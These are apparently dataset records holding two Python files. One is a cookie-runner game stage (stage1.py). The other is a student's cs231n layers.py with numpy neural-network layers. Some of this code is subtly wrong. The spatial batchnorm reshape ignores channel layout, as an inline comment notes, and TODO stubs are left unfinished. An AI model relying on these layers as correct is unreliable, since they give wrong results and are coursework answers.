json\nimport os\nimport time\n\nfrom cookie import *\nfrom back_ground import *\nfrom ground import *\nfrom obstacle import *\nfrom item import *\nfrom score import *\nimport game_framework\nimport title_state\nimport result_state\nimport stage1_select\nimport stage2_select\nimport stage3_select\nimport stage4_select\n\nname = \"MainState\"\n\ncookie = None\nbackground = None\nnomal_fork = None\nnomal_thorn = None\nspecial_fork = None\ndouble_thorn = None\nboard = None\nitem_jelly = None\nhp_jelly = None\nobject = []\nranking_data = []\ncurrent_time = 0.0\n\ndef collide(a, b):\n left_a, bottom_a, right_a, top_a = a.get_bb()\n left_b, bottom_b, right_b, top_b = b.get_bb()\n\n if left_a > right_b: return False\n if right_a < left_b: return False\n if top_a < bottom_b: return False\n if bottom_a > top_b: return False\n\n return True\n\ndef get_frame_time():\n\n global current_time\n\n frame_time = get_time() - current_time\n current_time += frame_time\n return frame_time\n\ndef enter():\n global cookie, background, ground, nomal_fork, nomal_thorn, special_fork, double_thorn, board, \\\n start, score_jelly, hp_jelly, font, objects, score, brave_cookie, ginger_brave_cookie, f, ranking_data\n\n cookie = stage1_select.get_cookie\n brave_cookie = stage1_select.brave_cookie_select\n ginger_brave_cookie = stage1_select.ginger_brave_cookie_select\n background = Stage1_Background(800, 600)\n ground = Stage1_Ground(800, 150)\n score = Score()\n board = Stage1_Board().create()\n nomal_fork = Stage1_Nomal_Fork().create()\n nomal_thorn = Stage1_Nomal_Thorn().create()\n special_fork = Stage1_Special_Fork().create()\n double_thorn = Stage1_Double_Thorn().create()\n score_jelly = Stage1_Score_Jelly().create()\n hp_jelly = Stage1_Hp_Jelly().create()\n objects = [nomal_fork, special_fork, nomal_thorn, double_thorn, score_jelly, hp_jelly, board]\n font = load_font('Resource\\\\ENCR10B.TTF')\n start = time.time()\n\n f = open('ranking_data.txt', 'r')\n ranking_data = json.load(f)\n f.close()\n\ndef exit():\n global cookie, background, ground, nomal_fork, nomal_thorn, special_fork, double_thorn, board, start, \\\n score_jelly, hp_jelly, objects, score\n del(cookie)\n del(background)\n del(ground)\n\n for list in objects:\n for dict in list:\n list.remove(dict)\n del(dict)\n del(list)\n\n end = time.time()\n\n print(\"Stage1 Clear Time : \", (end - start))\n\ndef pause():\n pass\n\n\ndef resume():\n pass\n\n\ndef handle_events():\n global cookie\n events = get_events()\n\n for event in events:\n if event.type == SDL_QUIT:\n game_framework.quit()\n\n elif event.type == SDL_KEYDOWN and event.key == SDLK_ESCAPE:\n game_framework.change_state(title_state)\n\n elif event.type == SDL_KEYDOWN and event.key == SDLK_2:\n game_framework.change_state(stage2_select)\n\n elif event.type == SDL_KEYDOWN and event.key == SDLK_3:\n game_framework.change_state(stage3_select)\n\n elif event.type == SDL_KEYDOWN and event.key == SDLK_4:\n game_framework.change_state(stage4_select)\n\n else:\n cookie.handle_events(event)\n\ndef update():\n global cookie, brave_cookie, ginger_brave_cookie, background, ground, nomal_fork, nomal_thorn, special_fork, double_thorn, board, \\\n score_jelly, hp_jelly, objects, score\n\n frame_time = get_frame_time()\n background.update(frame_time)\n ground.update(frame_time)\n score.stage1_score()\n cookie.update(frame_time)\n\n if brave_cookie == True and cookie.hp <= 0:\n cookie = Ginger_Brave_Cookie()\n if ginger_brave_cookie == True and cookie.hp <= 0:\n cookie = Brave_Cookie()\n\n for list in objects:\n 
for dict in list:\n dict.update(frame_time)\n if collide(cookie, dict):\n if list == score_jelly:\n list.remove(dict)\n cookie.scoreSound(dict)\n elif list == hp_jelly:\n list.remove(dict)\n cookie.heal(dict)\n elif list == board:\n for dict in list:\n dict.state = \"None\"\n else:\n cookie.state = \"Collide\"\n\n if background.map_size >= 55 and cookie.y == 200:\n game_framework.change_state(stage2_select)\n elif background.map_size >= 55 and cookie.y == 250:\n game_framework.change_state(stage3_select)\n if (Brave_Cookie.hp <= 0) and (Ginger_Brave_Cookie.hp <= 0):\n game_framework.change_state(result_state)\n\ndef draw():\n global cookie, background, ground, objects, score\n clear_canvas()\n background.draw()\n ground.draw()\n\n for list in objects:\n for dict in list:\n dict.draw()\n\n font.draw(100, 550, 'Score : %3.2d' % score.score, (255, 255, 255))\n cookie.draw()\n\n delay(0.03)\n update_canvas()", "sub_path": "stage1.py", "file_name": "stage1.py", "file_ext": "py", "file_size_in_byte": 4950, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "stage1_select.get_cookie", "line_number": 58, "usage_type": "attribute"}, {"api_name": "stage1_select.brave_cookie_select", "line_number": 59, "usage_type": "attribute"}, {"api_name": "stage1_select.ginger_brave_cookie_select", "line_number": 60, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 73, "usage_type": "call"}, {"api_name": "json.load", "line_number": 76, "usage_type": "call"}, {"api_name": "time.time", "line_number": 92, "usage_type": "call"}, {"api_name": "game_framework.quit", "line_number": 110, "usage_type": "call"}, {"api_name": "game_framework.change_state", "line_number": 113, "usage_type": "call"}, {"api_name": "game_framework.change_state", "line_number": 116, "usage_type": "call"}, {"api_name": "game_framework.change_state", "line_number": 119, "usage_type": "call"}, {"api_name": "game_framework.change_state", "line_number": 122, "usage_type": "call"}, {"api_name": "cookie.handle_events", "line_number": 125, "usage_type": "call"}, {"api_name": "ground.update", "line_number": 133, "usage_type": "call"}, {"api_name": "score.stage1_score", "line_number": 134, "usage_type": "call"}, {"api_name": "cookie.update", "line_number": 135, "usage_type": "call"}, {"api_name": "cookie.hp", "line_number": 137, "usage_type": "attribute"}, {"api_name": "cookie.hp", "line_number": 139, "usage_type": "attribute"}, {"api_name": "cookie.scoreSound", "line_number": 148, "usage_type": "call"}, {"api_name": "cookie.heal", "line_number": 151, "usage_type": "call"}, {"api_name": "cookie.state", "line_number": 156, "usage_type": "attribute"}, {"api_name": "cookie.y", "line_number": 158, "usage_type": "attribute"}, {"api_name": "game_framework.change_state", "line_number": 159, "usage_type": "call"}, {"api_name": "cookie.y", "line_number": 160, "usage_type": "attribute"}, {"api_name": "game_framework.change_state", "line_number": 161, "usage_type": "call"}, {"api_name": "game_framework.change_state", "line_number": 163, "usage_type": "call"}, {"api_name": "ground.draw", "line_number": 169, "usage_type": "call"}, {"api_name": "score.score", "line_number": 175, "usage_type": "attribute"}, {"api_name": "cookie.draw", "line_number": 176, "usage_type": "call"}]} +{"seq_id": "312266098", "text": "import numpy as np\nfrom scipy.signal import fftconvolve, convolve\nfrom itertools import product\n\ndef affine_forward(x, w, b):\n \"\"\"\n Computes the forward pass for 
an affine (fully-connected) layer.\n\n The input x has shape (N, d_1, ..., d_k) and contains a minibatch of N\n examples, where each example x[i] has shape (d_1, ..., d_k). We will\n reshape each input into a vector of dimension D = d_1 * ... * d_k, and\n then transform it to an output vector of dimension M.\n\n Inputs:\n - x: A numpy array containing input data, of shape (N, d_1, ..., d_k)\n - w: A numpy array of weights, of shape (D, M)\n - b: A numpy array of biases, of shape (M,)\n\n Returns a tuple of:\n - out: output, of shape (N, M)\n - cache: (x, w, b)\n \"\"\"\n cache = (x, w, b)\n x = x.reshape(x.shape[0], -1) # NxD\n out = x.dot(w) + b\n return out, cache\n\n\ndef affine_backward(dout, cache):\n \"\"\"\n Computes the backward pass for an affine layer.\n\n Inputs:\n - dout: Upstream derivative, of shape (N, M)\n - cache: Tuple of:\n - x: Input data, of shape (N, d_1, ... d_k)\n - w: Weights, of shape (D, M)\n - b: biases, of shape (M,\n\n Returns a tuple of:\n - dx: Gradient with respect to x, of shape (N, d1, ..., d_k)\n - dw: Gradient with respect to w, of shape (D, M)\n - db: Gradient with respect to b, of shape (M,)\n \"\"\"\n x, w, b = cache\n\n dx = dout.dot(w.T).reshape(x.shape)\n dw = x.reshape(x.shape[0], -1).T.dot(dout)\n db = dout.sum(axis=0)\n\n return dx, dw, db\n\n\ndef relu_forward(x):\n \"\"\"\n Computes the forward pass for a layer of rectified linear units (ReLUs).\n\n Input:\n - x: Inputs, of any shape\n\n Returns a tuple of:\n - out: Output, of the same shape as x\n - cache: x\n \"\"\"\n out = np.maximum(0, x)\n cache = x\n return out, cache\n\n\ndef relu_backward(dout, cache):\n \"\"\"\n Computes the backward pass for a layer of rectified linear units (ReLUs).\n\n Input:\n - dout: Upstream derivatives, of any shape\n - cache: Input x, of same shape as dout\n\n Returns:\n - dx: Gradient with respect to x\n \"\"\"\n dx, x = None, cache\n dout[np.where(x <= 0.)] = 0.\n dx = dout\n\n return dx\n\n\ndef batchnorm_forward(x, gamma, beta, bn_param):\n \"\"\"\n Forward pass for batch normalization.\n\n During training the sample mean and (uncorrected) sample variance are\n computed from minibatch statistics and used to normalize the incoming data.\n During training we also keep an exponentially decaying running mean of the mean\n and variance of each feature, and these averages are used to normalize data\n at test-time.\n\n At each timestep we update the running averages for mean and variance using\n an exponential decay based on the momentum parameter:\n\n running_mean = momentum * running_mean + (1 - momentum) * sample_mean\n running_var = momentum * running_var + (1 - momentum) * sample_var\n\n Note that the batch normalization paper suggests a different test-time\n behavior: they compute sample mean and variance for each feature using a\n large number of training images rather than using a running average. 
For\n this implementation we have chosen to use running averages instead since\n they do not require an additional estimation step; the torch7 implementation\n of batch normalization also uses running averages.\n\n Input:\n - x: Data of shape (N, D)\n - gamma: Scale parameter of shape (D,)\n - beta: Shift parameter of shape (D,)\n - bn_param: Dictionary with the following keys:\n - mode: 'train' or 'test'; required\n - eps: Constant for numeric stability\n - momentum: Constant for running mean / variance.\n - running_mean: Array of shape (D,) giving running mean of features\n - running_var Array of shape (D,) giving running variance of features\n\n Returns a tuple of:\n - out: of shape (N, D)\n - cache: A tuple of values needed in the backward pass\n \"\"\"\n mode = bn_param['mode']\n eps = bn_param.get('eps', 1e-5)\n momentum = bn_param.get('momentum', 0.9)\n\n N, D = x.shape\n running_mean = bn_param.get('running_mean', np.zeros(D, dtype=x.dtype))\n running_var = bn_param.get('running_var', np.zeros(D, dtype=x.dtype))\n\n out, cache = None, None\n if mode == 'train':\n var = np.var(x, axis=0)\n mean = x.mean(axis=0)\n x_shift = x - mean\n x_norm = x_shift/np.sqrt(var + eps)\n\n out = gamma*x_norm\n out += beta\n\n scale = (1. - momentum)\n running_mean *= momentum\n running_mean += scale*mean\n\n running_var *= momentum\n running_var += scale*var\n\n cache = (x_shift, x_norm, var+eps, gamma)\n # cache = (x, mean, var+eps, gamma)\n\n elif mode == 'test':\n out = (x - running_mean)/np.sqrt(running_var + eps)\n out *= gamma\n out += beta\n\n else:\n raise ValueError('Invalid forward batchnorm mode \"%s\"' % mode)\n\n # Store the updated running means back into bn_param\n bn_param['running_mean'] = running_mean\n bn_param['running_var'] = running_var\n\n return out, cache\n\n\ndef batchnorm_backward(dout, cache):\n \"\"\"\n Backward pass for batch normalization.\n\n For this implementation, you should write out a computation graph for\n batch normalization on paper and propagate gradients backward through\n intermediate nodes.\n\n Inputs:\n - dout: Upstream derivatives, of shape (N, D)\n - cache: Variable of intermediates from batchnorm_forward.\n\n Returns a tuple of:\n - dx: Gradient with respect to inputs x, of shape (N, D)\n - dgamma: Gradient with respect to scale parameter gamma, of shape (D,)\n - dbeta: Gradient with respect to shift parameter beta, of shape (D,)\n \"\"\"\n\n # I just did the alt version...vanilla was dumb\n\n return batchnorm_backward_alt(dout, cache)\n\n\ndef batchnorm_backward_alt(dout, cache):\n \"\"\"\n Alternative backward pass for batch normalization.\n\n For this implementation you should work out the derivatives for the batch\n normalizaton backward pass on paper and simplify as much as possible. 
You\n should be able to derive a simple expression for the backward pass.\n\n Note: This implementation should expect to receive the same cache variable\n as batchnorm_backward, but might not use all of the values in the cache.\n\n Inputs / outputs: Same as batchnorm_backward\n \"\"\"\n x_shift, x_norm, var_eps, gamma = cache\n dx_norm = gamma*dout\n\n dgamma = np.einsum('ij,ij->j', dout, x_norm)\n dbeta = np.sum(dout, axis=0)\n\n # equivalent closed form: dx = (dx_norm - mean(dx_norm, 0) - x_norm*mean(dx_norm*x_norm, 0)) / sqrt(var + eps)\n dx = dx_norm - np.mean(dx_norm, axis=0)\n dx -= x_shift*np.einsum('ij,ij->j', dx_norm, x_shift)/(var_eps*dx_norm.shape[0])\n dx /= np.sqrt(var_eps)\n\n return dx, dgamma, dbeta\n\n\ndef dropout_forward(x, dropout_param):\n \"\"\"\n Performs the forward pass for (inverted) dropout.\n\n Inputs:\n - x: Input data, of any shape\n - dropout_param: A dictionary with the following keys:\n - p: Dropout parameter. We keep each neuron output with probability p.\n - mode: 'test' or 'train'. If the mode is train, then perform dropout;\n if the mode is test, then just return the input.\n - seed: Seed for the random number generator. Passing seed makes this\n function deterministic, which is needed for gradient checking but not in\n real networks.\n\n Outputs:\n - out: Array of the same shape as x.\n - cache: A tuple (dropout_param, mask). In training mode, mask is the dropout\n mask that was used to multiply the input; in test mode, mask is None.\n \"\"\"\n p, mode = dropout_param['p'], dropout_param['mode']\n if 'seed' in dropout_param:\n np.random.seed(dropout_param['seed'])\n\n mask = None\n out = None\n\n if mode == 'train':\n mask = (np.random.rand(*x.shape) < p)/p\n out = x*mask\n elif mode == 'test':\n out = x\n\n cache = (dropout_param, mask)\n out = out.astype(x.dtype, copy=False)\n\n return out, cache\n\n\ndef dropout_backward(dout, cache):\n \"\"\"\n Perform the backward pass for (inverted) dropout.\n\n Inputs:\n - dout: Upstream derivatives, of any shape\n - cache: (dropout_param, mask) from dropout_forward.\n \"\"\"\n dropout_param, mask = cache\n mode = dropout_param['mode']\n\n dx = None\n if mode == 'train':\n dx = mask*dout\n elif mode == 'test':\n dx = dout\n return dx\n\n\ndef flip_ndarray(x):\n \"\"\" Reverse the positions of the entries of the input array along all of its axes.\n\n Parameters\n ----------\n x : numpy.ndarray\n\n Returns\n -------\n out : numpy.ndarray\n A view of x with all of its axes reversed. Since a view is returned, this operation is O(1).\n\n Example\n -------\n x = array([[1, 2, 3],\n [4, 5, 6]])\n flip_ndarray(x)\n >> array([[6, 5, 4],\n [3, 2, 1]])\"\"\"\n loc = tuple(slice(None, None, -1) for i in xrange(x.ndim))\n return x[loc]\n\n\ndef nd_convolve(dat, conv_kernel, stride, outshape=None):\n \"\"\" Perform a convolution of two ndarrays, using a specified stride.\n\n Parameters\n ----------\n dat : numpy.ndarray\n Array to be convolved over.\n conv_kernel : numpy.ndarray\n Kernel used to perform convolution.\n stride : Union[Iterable[int, ...], Dict[int, int], int]\n Step sizes used while sliding the kernel during the convolution.\n - If a dictionary is provided, then it is used to map (axis-index -> stride-value). 
If an\n axis is not specified in the dictionary keys, then a stride of 1 is used along that axis.\n - If an iterable is provided, it must provide an explicit stride value for each axis (in order\n of ascending axis-index).\n - If a single stride value is specified, that value is used for every axis.\n\n outshape : Optional[Tuple[int, ...]]\n Provide the known output shape of the convolution, allowing the function to bypass\n sanity checks and some initial computations.\n\n Returns\n -------\n out : numpy.ndarray\n An array of the resulting convolution.\n \"\"\"\n if np.max(dat.shape) >= 500:\n conv = fftconvolve\n else:\n conv = convolve\n\n if type(stride) is dict:\n stride_gen = (stride.get(key, 1) for key in range(dat.ndim))\n elif hasattr(stride, '__iter__'):\n stride_gen = stride\n else:\n stride_gen = (stride for i in range(dat.ndim))\n stride = np.fromiter(stride_gen, dtype=int)\n\n if outshape is None:\n outshape = get_outshape(dat.shape, conv_kernel.shape, stride)\n\n full_conv = conv(dat, conv_kernel, mode='valid')\n\n if np.all(stride == 1):\n return full_conv\n\n # all index positions to down-sample the convolution, given stride > 1\n all_pos = zip(*product(*(stride[n]*np.arange(i) for n,i in enumerate(outshape))))\n out = np.zeros(outshape, dtype=dat.dtype)\n out.flat = full_conv[all_pos]\n return out\n\n\ndef get_outshape(dat_shape, kernel_shape, stride):\n \"\"\" Returns the shape of the ndarray resulting from the convolution, using specified stride,\n of two ndarrays whose shapes are specified.\n\n Parameters\n ----------\n dat_shape : Iterable[int, ...]\n Shape of array to be convolved over.\n kernel_shape : Iterable[int, ...]\n Shape of kernel used to perform convolution.\n stride : Union[int, Iterable[int, ...]] ( > 0)\n Step size used while sliding the kernel during the convolution.\n\n Returns\n -------\n out : numpy.ndarray([int, ...])\n Shape of the array resulting from the convolution.\"\"\"\n\n dat_shape = np.array(dat_shape)\n kernel_shape = np.array(kernel_shape)\n\n if hasattr(stride, '__iter__'):\n stride = np.fromiter(stride, dtype=float)\n assert len(stride) == len(dat_shape), 'The stride iterable must provide a stride value for each dat axis.'\n else:\n stride = float(stride)\n assert len(dat_shape) == len(kernel_shape), \"kernel and data must have same number of dimensions\"\n\n outshape = (dat_shape-kernel_shape)/stride+1.\n for num in outshape:\n assert num.is_integer(), num\n outshape = np.rint(outshape).astype(int)\n\n return outshape\n\n\ndef padder(dat, pad, skip_axes=[0]):\n \"\"\" Returns an array padded with zeros with specified depth on both sides of each axis. 
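For example, with pad=1 and the default skip_axes=[0], an input of shape (2, 3) is padded to shape (2, 5). 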
A list of\n axes can be specified, which will not receive any padding.\n\n Parameters\n ----------\n dat : numpy.ndarray\n Array to be padded\n pad : int ( >= 0)\n Padding depth to be used on each end of a padding axis.\n skip_axes : Union[int, Iterable[int, ...]]\n The indices corresponding to axes that will not be padded.\n\n Returns\n -------\n out : numpy.ndarray\n Array padded with zeros.\"\"\"\n assert pad >= 0 and type(pad) == int\n if pad == 0:\n return dat\n\n if type(skip_axes) == int:\n skip_axes = [skip_axes]\n assert hasattr(skip_axes, '__iter__')\n padding = [(pad, pad) for i in xrange(dat.ndim)]\n\n for ax in skip_axes:\n padding[ax] = (0, 0)\n\n return np.pad(dat, padding, mode='constant').astype(dat.dtype)\n\n\ndef conv_forward_naive(x, w, b, conv_param):\n \"\"\"\n A naive implementation of the forward pass for a convolutional layer.\n\n The input consists of N data points, each with C channels, height H and width\n W. We convolve each input with F different filters, where each filter spans\n all C channels and has height HH and width HH.\n\n Input:\n - x: Input data of shape (N, C, H, W)\n - w: Filter weights of shape (F, C, HH, WW)\n - b: Biases, of shape (F,)\n - conv_param: A dictionary with the following keys:\n - 'stride': The number of pixels between adjacent receptive fields in the\n horizontal and vertical directions.\n - 'pad': The number of pixels that will be used to zero-pad the input.\n\n Returns a tuple of:\n - out: Output data, of shape (N, F, H', W') where H' and W' are given by\n H' = 1 + (H + 2 * pad - HH) / stride\n W' = 1 + (W + 2 * pad - WW) / stride\n - cache: (x, w, b, conv_param)\n \"\"\"\n\n pad_x = padder(x, conv_param['pad'], skip_axes=[0, 1])\n conv_out_shape = get_outshape(pad_x[0].shape, w[0].shape, conv_param['stride'])\n out = np.zeros((x.shape[0], w.shape[0], conv_out_shape[-2], conv_out_shape[-1]))\n\n for nk, kernel in enumerate(w):\n # note: we are actually computing a correlation, not a convolution\n conv_kernel = flip_ndarray(kernel)\n for nd, dat in enumerate(pad_x):\n out[nd, nk, :, :] = nd_convolve(dat, conv_kernel, conv_param['stride'], conv_out_shape)\n out[:, nk:nk+1, :, :] += b[nk]\n\n cache = (x, w, b, conv_param)\n return out, cache\n\n\ndef conv_backward_naive(dout, cache):\n \"\"\"\n A naive implementation of the backward pass for a convolutional layer.\n\n Inputs:\n - dout: Upstream derivatives.\n - cache: A tuple of (x, w, b, conv_param) as in conv_forward_naive\n\n Returns a tuple of:\n - dx: Gradient with respect to x\n - dw: Gradient with respect to w\n - db: Gradient with respect to b\n \"\"\"\n\n x, w, b, conv_param = cache\n\n dx = np.zeros_like(x, dtype=x.dtype)\n dw = np.zeros_like(w, dtype=w.dtype)\n db = np.sum(dout, axis=(0, 2, 3))\n\n pad = conv_param['pad']\n stride = conv_param['stride']\n\n npad = np.array([0]+[pad for i in xrange(x[0].ndim-1)])\n outshape = (np.array(x[0].shape)-np.array(w[0].shape)+2.*npad)/float(stride)+1.\n outshape = np.round(outshape).astype(int)\n\n # all positions to place the kernel\n all_pos = list(product(*[stride*np.arange(i) for i in outshape]))\n all_slices = [tuple(slice(start, start+w[0].shape[i]) for i,start in enumerate(j)) for j in all_pos]\n\n if pad:\n pad_ax = [(0, 0)] + [(pad, pad) for i in xrange(x[0].ndim-1)]\n\n for nk, kernel in enumerate(w): # iterate over all kernels\n dx_kernel = np.zeros(x.shape, dtype=x.dtype)\n dkernel = np.zeros_like(kernel, dtype=kernel.dtype)\n for nd, dat in enumerate(x): # iterate over each piece of data to be convolved\n if pad:\n dat 
= np.pad(dat, pad_ax, mode='constant').astype(dat.dtype)\n\n dy = dout[nd, nk][np.newaxis, :, :]\n ddat = np.zeros((x[0].shape[0], x[0].shape[1]+2*pad, x[0].shape[2]+2*pad), dtype=x[0].dtype)\n\n for i, slices in enumerate(all_slices):\n loc = np.unravel_index(i, outshape)\n dy_val = dy[loc]\n ddat[slices] += dy_val*kernel\n dkernel += dy_val*dat[slices]\n\n if pad:\n ddat = ddat[:, pad:-pad, pad:-pad]\n\n dx_kernel[nd] = ddat[:]\n dw[nk:nk+1] = dkernel\n dx += dx_kernel\n\n return dx, dw, db\n\n\ndef max_pool(x, pool_shape, stride, pooling_axes, backprop=False, dout=None):\n \"\"\" Pool the values of an ndarray, by taking the max over a specified pooling\n filter volume that rasters across the specified axes of x with a given stride.\n\n A backprop flag can be toggled to, instead, perform back-propagation through the\n maxpool layer (i.e. pass gradient values through of the array elements that\n contributed to the forward pooling).\n\n Parameters\n ----------\n x : numpy.ndarray\n Input array to be pooled.\n pool_shape : Iterable[int, ...]\n Shape of the pooling_filter along each specified pooling axis, listed\n in ascending axis order. No entries are provided for non-pooling axes.\n stride : int ( > 0)\n Step size used while rastering the pooling filter across x.\n pooling_axes : Union[int, Iterable[int, ...]]\n The axes along which the values of x will be max-pooled.\n backprop : bool, optional\n Indicates whether or not max_pool performs back propagation\n instead of pooling.\n dout : Union[NoneType, numpy.ndarray]\n \"Upstream\" array, whose values will be back propagated through\n the max-pool layer. This must be specified if backprop is True.\n\n Returns\n -------\n if backprop is False\n out : numpy.ndarray\n An array of the max-pooled values of x.\n\n if backprop is True\n dx : numpy.ndarray (shape=x.shape)\n An array of values from dout back-propagated through the pooling layer.\n \"\"\"\n\n if type(pooling_axes) is int:\n pooling_axes = (pooling_axes)\n pooling_axes = tuple(sorted(pooling_axes))\n\n pool_only_slice = tuple(slice(None, None) if i in pooling_axes else 0 for i in range(x.ndim))\n outshape = get_outshape(x[pool_only_slice].shape, pool_shape, stride)\n\n if backprop:\n assert dout is not None, \"dout must be provided during backprop\"\n mask_view = tuple(np.newaxis if i in pooling_axes else slice(None, None) for i in range(x.ndim))\n dx = np.zeros_like(x, dtype=x.dtype)\n\n else:\n tmp_shape = list(x.shape)\n for i, ax in enumerate(pooling_axes):\n tmp_shape[ax] = outshape[i]\n out = np.zeros(tmp_shape, dtype=x.dtype)\n\n all_slices = [slice(None, None) for i in range(x.ndim)]\n\n # iterate over positions to place the pooling filter\n for i, pos in enumerate(product(*[stride*np.arange(i) for i in outshape])):\n\n slices = all_slices[:]\n # generate slices to make pooling filter views of x\n for j, start in enumerate(pos):\n slices[pooling_axes[j]] = slice(start, start + pool_shape[j])\n slices = tuple(slices)\n\n # generate slices of output array to update\n inds = np.unravel_index(i, outshape)\n loc = all_slices[:]\n for cnt, ax in enumerate(pooling_axes):\n loc[ax] = inds[cnt]\n\n maxes = np.amax(x[slices], axis=pooling_axes)\n\n if not backprop:\n out[loc] = maxes\n else:\n dx[slices][np.where(x[slices] == maxes[mask_view])] = dout[loc].flat\n\n if not backprop:\n return out\n else:\n return dx\n\n\ndef max_pool_forward_naive(x, pool_param):\n \"\"\"\n A naive implementation of the forward pass for a max pooling layer.\n\n Inputs:\n - x: Input data, of shape (N, 
C, H, W)\n - pool_param: dictionary with the following keys:\n - 'pool_height': The height of each pooling region\n - 'pool_width': The width of each pooling region\n - 'stride': The distance between adjacent pooling regions\n\n Returns a tuple of:\n - out: Output data\n - cache: (x, pool_param)\n \"\"\"\n\n pool_shape = (pool_param['pool_height'], pool_param['pool_width'])\n cache = (x, pool_param)\n return max_pool(x, pool_shape, pool_param['stride'], (2, 3)), cache\n\n\ndef max_pool_backward_naive(dout, cache):\n \"\"\"\n A naive implementation of the backward pass for a max pooling layer.\n\n Inputs:\n - dout: Upstream derivatives\n - cache: A tuple of (x, pool_param) as in the forward pass.\n\n Returns:\n - dx: Gradient with respect to x\n \"\"\"\n x, pool_param = cache\n pool_shape = (pool_param['pool_height'], pool_param['pool_width'])\n return max_pool(x, pool_shape, pool_param['stride'], (2, 3), backprop=True, dout=dout)\n\n\ndef spatial_batchnorm_forward(x, gamma, beta, bn_param):\n \"\"\"\n Computes the forward pass for spatial batch normalization.\n\n Inputs:\n - x: Input data of shape (N, C, H, W)\n - gamma: Scale parameter, of shape (C,)\n - beta: Shift parameter, of shape (C,)\n - bn_param: Dictionary with the following keys:\n - mode: 'train' or 'test'; required\n - eps: Constant for numeric stability\n - momentum: Constant for running mean / variance. momentum=0 means that\n old information is discarded completely at every time step, while\n momentum=1 means that new information is never incorporated. The\n default of momentum=0.9 should work well in most situations.\n - running_mean: Array of shape (D,) giving running mean of features\n - running_var Array of shape (D,) giving running variance of features\n\n Returns a tuple of:\n - out: Output data, of shape (N, C, H, W)\n - cache: Values needed for the backward pass\n \"\"\"\n out, cache = None, None\n\n N, C, H, W = x.shape\n out, cache = batchnorm_forward(x.reshape(-1, C), gamma, beta, bn_param)\n\n #############################################################################\n # TODO: Implement the forward pass for spatial batch normalization. #\n # #\n # HINT: You can implement spatial batch normalization using the vanilla #\n # version of batch normalization defined above. Your implementation should #\n # be very short; ours is less than five lines. #\n #############################################################################\n pass\n #############################################################################\n # END OF YOUR CODE #\n #############################################################################\n\n return out.reshape(N, C, H, W), cache\n\n\ndef spatial_batchnorm_backward(dout, cache):\n \"\"\"\n Computes the backward pass for spatial batch normalization.\n\n Inputs:\n - dout: Upstream derivatives, of shape (N, C, H, W)\n - cache: Values from the forward pass\n\n Returns a tuple of:\n - dx: Gradient with respect to inputs, of shape (N, C, H, W)\n - dgamma: Gradient with respect to scale parameter, of shape (C,)\n - dbeta: Gradient with respect to shift parameter, of shape (C,)\n \"\"\"\n dx, dgamma, dbeta = None, None, None\n N, C, H, W = dout.shape\n\n dx, dgamma, dbeta = batchnorm_backward_alt(dout.reshape(-1, C), cache)\n #############################################################################\n # TODO: Implement the backward pass for spatial batch normalization. 
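#\n # Note: dout.reshape(-1, C), as used above, does not group values by #\n # channel. A common reduction (a sketch, not necessarily the intended #\n # solution here) transposes so C is the trailing axis before flattening: #\n # dx, dgamma, dbeta = batchnorm_backward_alt( #\n # dout.transpose(0, 2, 3, 1).reshape(-1, C), cache) #\n # dx = dx.reshape(N, H, W, C).transpose(0, 3, 1, 2) #\n 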
#\n # #\n # HINT: You can implement spatial batch normalization using the vanilla #\n # version of batch normalization defined above. Your implementation should #\n # be very short; ours is less than five lines. #\n #############################################################################\n pass\n #############################################################################\n # END OF YOUR CODE #\n #############################################################################\n\n return dx.reshape(N, C, H, W), dgamma, dbeta\n\n\ndef svm_loss(x, y):\n \"\"\"\n Computes the loss and gradient using for multiclass SVM classification.\n\n Inputs:\n - x: Input data, of shape (N, C) where x[i, j] is the score for the jth class\n for the ith input.\n - y: Vector of labels, of shape (N,) where y[i] is the label for x[i] and\n 0 <= y[i] < C\n\n Returns a tuple of:\n - loss: Scalar giving the loss\n - dx: Gradient of the loss with respect to x\n \"\"\"\n N = x.shape[0]\n correct_class_scores = x[np.arange(N), y]\n margins = np.maximum(0, x - correct_class_scores[:, np.newaxis] + 1.0)\n margins[np.arange(N), y] = 0\n loss = np.sum(margins) / N\n num_pos = np.sum(margins > 0, axis=1)\n dx = np.zeros_like(x)\n dx[margins > 0] = 1\n dx[np.arange(N), y] -= num_pos\n dx /= N\n return loss, dx\n\n\ndef softmax_loss(x, y):\n \"\"\"\n Computes the loss and gradient for softmax classification.\n\n Inputs:\n - x: Input data, of shape (N, C) where x[i, j] is the score for the jth class\n for the ith input.\n - y: Vector of labels, of shape (N,) where y[i] is the label for x[i] and\n 0 <= y[i] < C\n\n Returns a tuple of:\n - loss: Scalar giving the loss\n - dx: Gradient of the loss with respect to x\n \"\"\"\n probs = np.exp(x - np.max(x, axis=1, keepdims=True))\n probs /= np.sum(probs, axis=1, keepdims=True)\n N = x.shape[0]\n loss = -np.sum(np.log(probs[np.arange(N), y])) / N\n dx = probs.copy()\n dx[np.arange(N), y] -= 1\n dx /= N\n return loss, dx\n", "sub_path": "assignment2/cs231n/layers.py", "file_name": "layers.py", "file_ext": "py", "file_size_in_byte": 26335, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.maximum", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 239, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 239, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 245, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 324, "usage_type": "call"}, {"api_name": "scipy.signal.fftconvolve", "line_number": 325, "usage_type": "name"}, {"api_name": "scipy.signal.convolve", "line_number": 
